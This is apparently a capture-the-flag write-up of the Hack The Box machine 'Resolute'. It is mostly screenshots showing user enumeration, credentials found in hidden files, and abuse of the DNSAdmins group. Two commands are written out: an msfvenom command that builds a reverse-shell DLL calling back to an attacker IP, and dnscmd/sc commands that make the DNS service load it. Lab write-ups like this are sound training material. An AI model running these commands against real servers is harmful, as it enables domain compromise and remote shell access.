ur- resolute - 10.10.10.169

Starting off we use nmap automator
From this we see that there is smb. And that it is a windows 2016 server


![688639cd98e2e94faae7ab48b8a417b9.png](../../_resources/880f6be9751e427bbe7ce9801af3db3c.png)



With this we can run enum4linux to get a list of valid users



![4cbb3c1309cd83f2a561c9612857f397.png](../../_resources/f33beaac1ec94ca3870d648b8b006296.png)



![543170e7feb415eb195861cae157e235.png](../../_resources/75c5c6c32dfd4d2f8d2508d4b81d096a.png)



![d069dc5f1be585cc03b1a622ff4b9c31.png](../../_resources/fc1ad57e064446a48a9a7f86f1b5d451.png)



![9a1d6ba37b58848ef258d6fd86bf99f2.png](../../_resources/45d265aa53ba439386299bb2e67b3c9d.png)








Looking round the drive i found some hiden files ith Get-ChildItem . -Force


![af515c6509d5dbfaa1a23864dfbeb01c.png](../../_resources/67258c3b745c4d31bf5bf943625aad30.png)


From this file we see which looks like creds to a ryan user


![bca813d39ef865a12d0a6bf8841df7c2.png](../../_resources/913eaff20ab04fb78424a64822957210.png)


Attempting login we see


![650b33d1618686f346b0b8b354a0e00c.png](../../_resources/2c2cf3fccd7d4ac49e8e59afb1cf2226.png)


browseing this users desktop we see the following


![c77891adfeff29f05077525d56253c4f.png](../../_resources/cbb79220dcbd4028806320ab8335159f.png)



![b2112347e04fc082483e46266704ac14.png](../../_resources/fd1999cfc7d847a2959f5102986aa734.png)



Useing the impacket ntlmreleay we get a view of the permission laytout



![7f9a02651eaa621ba534f9fbdace9ad6.png](../../_resources/34f5c2ae56044a4c8ce26bd1bac3b8b1.png)


![a315248af8331d4fd696a0a34d015dab.png](:/5e4516fcc74345c795f68b196651e3a3)



We see that the contactors group is part of DNSAdmins


![8349cd6d6f1340b0dc863af697671394.png](../../_resources/82147d82b02c4030bacec1e98ba6a4d5.png)


And that ryan is a contractor


![311652836523a4a31c6ef7ab110ea701.png](../../_resources/90ffd44d64f741a4b84d7203563ff30c.png)


With this i began googleing and found
https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-dnsadmins-to-system-to-domain-compromise
and
https://www.abhizer.com/windows-privilege-escalation-dnsadmin-to-domaincontroller/


With this i created a dll for windows using MSFVenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.7 LPORT=1338 --platform=windows -f dll > plugin.dll



![345cb8d8c2fdc6cbab7ac83b0444fe09.png](../../_resources/cf3aa5fba60a4806b68f366458a702d1.png)


![f3df520707e2d1445fe2d8c1beb40512.png](../../_resources/8c45f1a8afc2441dac7ea4b8cab5b520.png)




![cb95385feadafa0904c15ef6da1cf7a0.png](../../_resources/fcc3fa3e90b04369b2c9de1856293735.png)



dnscmd.exe /config /serverlevelplugindll \\10.10.14.7\share\plugin.dll
sc.exe stop dns
sc.exe start dns


Had plenty off issues gettign this running. Just had to retry multiple times.



![3a38526d8fca33191211429f38252af7.png](../../_resources/0e877ad5f7c34c08b74a58a1636d1228.png)




![b6e63fe0b4a55337c37b559fe6810c7f.png](../../_resources/f316f9fc961a43b79da77c123dc7dfd1.png)



![eb2d44c3fcc8c556011ef94ebd568501.png](../../_resources/839ea4b3fec14e739acc6a920d7b1118.png)







